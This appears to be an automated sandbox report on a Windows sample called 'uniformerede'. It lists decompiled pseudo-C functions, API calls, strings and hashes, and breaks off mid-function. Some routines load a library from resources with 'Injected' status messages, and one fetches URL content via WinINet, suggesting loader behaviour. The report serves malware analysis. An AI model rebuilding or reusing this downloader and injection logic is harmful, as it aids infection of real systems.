                                                                                                                                                                                                                            • Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                                                                                                                                                                                            • Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				struct HKL__* _v280;
                                                                                                                                                                                                                            				char _v536;
                                                                                                                                                                                                                            				char _v600;
                                                                                                                                                                                                                            				char _v604;
                                                                                                                                                                                                                            				char _v608;
                                                                                                                                                                                                                            				char _v612;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                            				void* _t118;
                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                            				void* _t129;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t129 = __fp0;
                                                                                                                                                                                                                            				_t117 = _t118;
                                                                                                                                                                                                                            				_t119 = _t118 + 0xfffffda0;
                                                                                                                                                                                                                            				_v612 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t117);
                                                                                                                                                                                                                            				_push(0x45860f);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t119;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                            					_pop(_t106);
                                                                                                                                                                                                                            					 *[fs:eax] = _t106;
                                                                                                                                                                                                                            					_push(0x458616);
                                                                                                                                                                                                                            					return E004049C0( &_v612);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_v8 + 0x34)) = E00403BBC(1);
                                                                                                                                                                                                                            					E004049C0(_v8 + 0x38);
                                                                                                                                                                                                                            					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                                                                                                                                                                                                            					if(_t60 < 0) {
                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                            						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                                                                                                                                                                                                            						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v20 = _t60 + 1;
                                                                                                                                                                                                                            						_v24 =  &_v280;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							if(E00446294( *_v24) == 0) {
                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v608 =  *_v24;
                                                                                                                                                                                                                            								_v604 = 0;
                                                                                                                                                                                                                            								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                                                                                                                                                                                                                            									goto L9;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_push(_t117);
                                                                                                                                                                                                                            									_push(0x4585cb);
                                                                                                                                                                                                                            									_push( *[fs:eax]);
                                                                                                                                                                                                                            									 *[fs:eax] = _t119;
                                                                                                                                                                                                                            									_v12 = 0x100;
                                                                                                                                                                                                                            									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                                                                                                                                                                                                            										E00404C30( &_v612, 0x100,  &_v536);
                                                                                                                                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                                                                                                                                                                                                            										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                                                                                                                                                                                                            											E00404C30(_v8 + 0x38, 0x100,  &_v536);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_pop(_t111);
                                                                                                                                                                                                                            									 *[fs:eax] = _t111;
                                                                                                                                                                                                                            									_push(0x4585d2);
                                                                                                                                                                                                                            									return RegCloseKey(_v16);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                            							_v24 = _v24 + 4;
                                                                                                                                                                                                                            							_t38 =  &_v20;
                                                                                                                                                                                                                            							 *_t38 = _v20 - 1;
                                                                                                                                                                                                                            						} while ( *_t38 != 0);
                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L12:
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,00000000,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • layout text, xrefs: 00458553
                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                                                                                                                                            • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                                                                                                                                            • API String ID: 1703357764-2652665750
                                                                                                                                                                                                                            • Opcode ID: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                                                                                                                                                                                            • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                            			E004288B4(void* __eax, void* __edx) {
                                                                                                                                                                                                                            				BYTE* _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				short _v18;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				short _v26;
                                                                                                                                                                                                                            				short _v28;
                                                                                                                                                                                                                            				char _v38;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                            				struct HDC__* _t43;
                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t83 = _t85;
                                                                                                                                                                                                                            				_t86 = _t85 + 0xffffffdc;
                                                                                                                                                                                                                            				_t80 = __edx;
                                                                                                                                                                                                                            				_t65 = __eax;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                                                                                                                                                                                                            					return __eax;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E004032B4( &_v38, 0x16);
                                                                                                                                                                                                                            					_t67 =  *((intOrPtr*)(_t65 + 0x28));
                                                                                                                                                                                                                            					_v38 = 0x9ac6cdd7;
                                                                                                                                                                                                                            					_t35 =  *((intOrPtr*)(_t67 + 0x18));
                                                                                                                                                                                                                            					if(_t35 != 0) {
                                                                                                                                                                                                                            						_v24 = _t35;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v24 = 0x60;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                                                                                                                                                                                                            					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                                                                                                                                                                                                            					_t43 = E00426DA8( &_v38);
                                                                                                                                                                                                                            					_v18 = _t43;
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407638();
                                                                                                                                                                                                                            					_v16 = _t43;
                                                                                                                                                                                                                            					_push(_t83);
                                                                                                                                                                                                                            					_push(0x4289ef);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t86;
                                                                                                                                                                                                                            					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
                                                                                                                                                                                                                            					_v8 = E0040275C(_v12);
                                                                                                                                                                                                                            					_push(_t83);
                                                                                                                                                                                                                            					_push(0x4289cf);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t86;
                                                                                                                                                                                                                            					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
                                                                                                                                                                                                                            						E00425FB8(_t67);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0041D904(_t80, 0x16,  &_v38);
                                                                                                                                                                                                                            					E0041D904(_t80, _v12, _v8);
                                                                                                                                                                                                                            					_pop(_t77);
                                                                                                                                                                                                                            					 *[fs:eax] = _t77;
                                                                                                                                                                                                                            					_push(0x4289d6);
                                                                                                                                                                                                                            					return E0040277C(_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00428934
                                                                                                                                                                                                                            • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                                                                                                                                                                                            • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BitsFileMeta
                                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                                            • API String ID: 858000408-2679148245
                                                                                                                                                                                                                            • Opcode ID: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                                                                                                                                                                                            • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00477940(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t45;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t60;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                            				intOrPtr _t95;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t96 = __eflags;
                                                                                                                                                                                                                            				_t91 = __esi;
                                                                                                                                                                                                                            				_t90 = __edi;
                                                                                                                                                                                                                            				_t93 = _t94;
                                                                                                                                                                                                                            				_t95 = _t94 + 0xfffffff0;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				E00404E70(_v16);
                                                                                                                                                                                                                            				_push(_t93);
                                                                                                                                                                                                                            				_push(0x477a75);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t95;
                                                                                                                                                                                                                            				if(E00409A48(_v8, _t96) != 0) {
                                                                                                                                                                                                                            					_push(_t93);
                                                                                                                                                                                                                            					_push(0x477a50);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t95;
                                                                                                                                                                                                                            					 *0x49ec78 = LoadLibraryA(E00404E80(_v8));
                                                                                                                                                                                                                            					_t45 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            					if(E004770E4(_t45, 0, _v16, __edi, __esi) != 0) {
                                                                                                                                                                                                                            						_t47 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            						E0047717C(_t47, 0,  &_v20, _v16, _t90, _t91);
                                                                                                                                                                                                                            						_t50 = E00409628(_v20, _t93, __eflags);
                                                                                                                                                                                                                            						__eflags = _t50 - _a12;
                                                                                                                                                                                                                            						if(_t50 >= _a12) {
                                                                                                                                                                                                                            							_t51 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            							FreeLibrary(_t51);
                                                                                                                                                                                                                            							E00404CCC(_a4, _v8, "Injected Canceled-> ");
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E004774A8(_v8, 0, _v12, _t90, _t91, 1);
                                                                                                                                                                                                                            							E00404CCC(_a4, _v8, "Vrs Updated -> ");
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t60 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            						FreeLibrary(_t60);
                                                                                                                                                                                                                            						E004774A8(_v8, 0, _v12, _t90, _t91, 0);
                                                                                                                                                                                                                            						E00404CCC(_a4, _v8, "Completed -> ");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t85);
                                                                                                                                                                                                                            					 *[fs:eax] = _t85;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t80);
                                                                                                                                                                                                                            				 *[fs:eax] = _t80;
                                                                                                                                                                                                                            				_push(0x477a7c);
                                                                                                                                                                                                                            				return E004049E4( &_v20, 4);
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x00477a31
                                                                                                                                                                                                                            0x00477a41
                                                                                                                                                                                                                            0x00477a09
                                                                                                                                                                                                                            0x00477a14
                                                                                                                                                                                                                            0x00477a24
                                                                                                                                                                                                                            0x00477a24
                                                                                                                                                                                                                            0x004779bf
                                                                                                                                                                                                                            0x004779bf
                                                                                                                                                                                                                            0x004779c5
                                                                                                                                                                                                                            0x004779d5
                                                                                                                                                                                                                            0x004779e5
                                                                                                                                                                                                                            0x004779e5
                                                                                                                                                                                                                            0x00477a48
                                                                                                                                                                                                                            0x00477a4b
                                                                                                                                                                                                                            0x00477a4b
                                                                                                                                                                                                                            0x00477a5c
                                                                                                                                                                                                                            0x00477a5f
                                                                                                                                                                                                                            0x00477a62
                                                                                                                                                                                                                            0x00477a74

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00477A50,?,00000000,00477A75), ref: 004779A4
                                                                                                                                                                                                                              • Part of subcall function 004770E4: FindResourceA.KERNEL32(?,00000000,0000000A), ref: 00477120
                                                                                                                                                                                                                              • Part of subcall function 004770E4: FreeResource.KERNEL32(00000000,?,00000000,0000000A,00000000,0047713F,?,00000000,0047716D), ref: 00477130
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00000000,00477A50,?,00000000,00477A75), ref: 004779C5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibraryResource$FindLoad
                                                                                                                                                                                                                            • String ID: Completed -> $Injected Canceled-> $Vrs Updated ->
                                                                                                                                                                                                                            • API String ID: 622515136-3620720946
                                                                                                                                                                                                                            • Opcode ID: 66de7adaf98f1cf7769a9c04e92696b8a01e4c8dc0b3f0b8a8594ae9463f5719
                                                                                                                                                                                                                            • Instruction ID: ba9099d9801d0205c677ecf17e877f95f1885b5d0e30a850265bd7c2820a7478
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66de7adaf98f1cf7769a9c04e92696b8a01e4c8dc0b3f0b8a8594ae9463f5719
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E317874A08204AFEB00EFA5D8519DE77B4EB89314B60C47BF908B7391D739AE01CB58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                                                                            			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				void _v1042;
                                                                                                                                                                                                                            				char _v1048;
                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t62 = _t63;
                                                                                                                                                                                                                            				_t64 = _t63 + 0xfffffbec;
                                                                                                                                                                                                                            				_v1048 = 0;
                                                                                                                                                                                                                            				_t47 = __edx;
                                                                                                                                                                                                                            				_t60 = __eax;
                                                                                                                                                                                                                            				_push(_t62);
                                                                                                                                                                                                                            				_push(0x4750fb);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t64;
                                                                                                                                                                                                                            				E004049C0(__edx);
                                                                                                                                                                                                                            				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
                                                                                                                                                                                                                            				_push(_t62);
                                                                                                                                                                                                                            				_push(0x4750db);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t64;
                                                                                                                                                                                                                            				if(_v8 == 0) {
                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                            					_pop(_t55);
                                                                                                                                                                                                                            					 *[fs:eax] = _t55;
                                                                                                                                                                                                                            					_push(0x4750e2);
                                                                                                                                                                                                                            					return InternetCloseHandle(_v8);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v12 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0);
                                                                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(_t62);
                                                                                                                                                                                                                            						_push(0x4750bd);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t64;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_v16 = 0x400;
                                                                                                                                                                                                                            							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16);
                                                                                                                                                                                                                            							if(_v16 == 0) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
                                                                                                                                                                                                                            							E00404C30( &_v1048, 0x402,  &_v1042);
                                                                                                                                                                                                                            							E00404C88(_t47, _v1048);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_pop(_t56);
                                                                                                                                                                                                                            						 *[fs:eax] = _t56;
                                                                                                                                                                                                                            						_push(0x4750c4);
                                                                                                                                                                                                                            						return InternetCloseHandle(_v12);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            0x00475042
                                                                                                                                                                                                                            0x00475044
                                                                                                                                                                                                                            0x00475045
                                                                                                                                                                                                                            0x0047504a
                                                                                                                                                                                                                            0x0047504d
                                                                                                                                                                                                                            0x00475050
                                                                                                                                                                                                                            0x00475050
                                                                                                                                                                                                                            0x0047506b
                                                                                                                                                                                                                            0x00475074
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00475079
                                                                                                                                                                                                                            0x00475092
                                                                                                                                                                                                                            0x0047509f
                                                                                                                                                                                                                            0x0047509f
                                                                                                                                                                                                                            0x004750a8
                                                                                                                                                                                                                            0x004750ab
                                                                                                                                                                                                                            0x004750ae
                                                                                                                                                                                                                            0x004750bc
                                                                                                                                                                                                                            0x004750bc
                                                                                                                                                                                                                            0x0047503c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                            • String ID: MyApp
                                                                                                                                                                                                                            • API String ID: 3121278467-2115267534
                                                                                                                                                                                                                            • Opcode ID: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                                                                                                                                                                                            • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                                                                            			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t41;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t45 = _t46;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                            				_t28 = __eax;
                                                                                                                                                                                                                            				if( *0x49eba0 == 0) {
                                                                                                                                                                                                                            					 *0x49eba0 = E0040D9DC("comctl32.dll", __eax);
                                                                                                                                                                                                                            					if( *0x49eba0 >= 0x60000) {
                                                                                                                                                                                                                            						_t41 = GetModuleHandleA("comctl32.dll");
                                                                                                                                                                                                                            						if(_t41 != 0) {
                                                                                                                                                                                                                            							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v8 = E00422634(_t43, 1, 0);
                                                                                                                                                                                                                            				_push(_t45);
                                                                                                                                                                                                                            				_push(0x448ebe);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t46;
                                                                                                                                                                                                                            				if( *0x49eba4 == 0) {
                                                                                                                                                                                                                            					_t9 = _v8;
                                                                                                                                                                                                                            					if(_t9 != 0) {
                                                                                                                                                                                                                            						_t9 = _t9 - 0xffffffec;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t9);
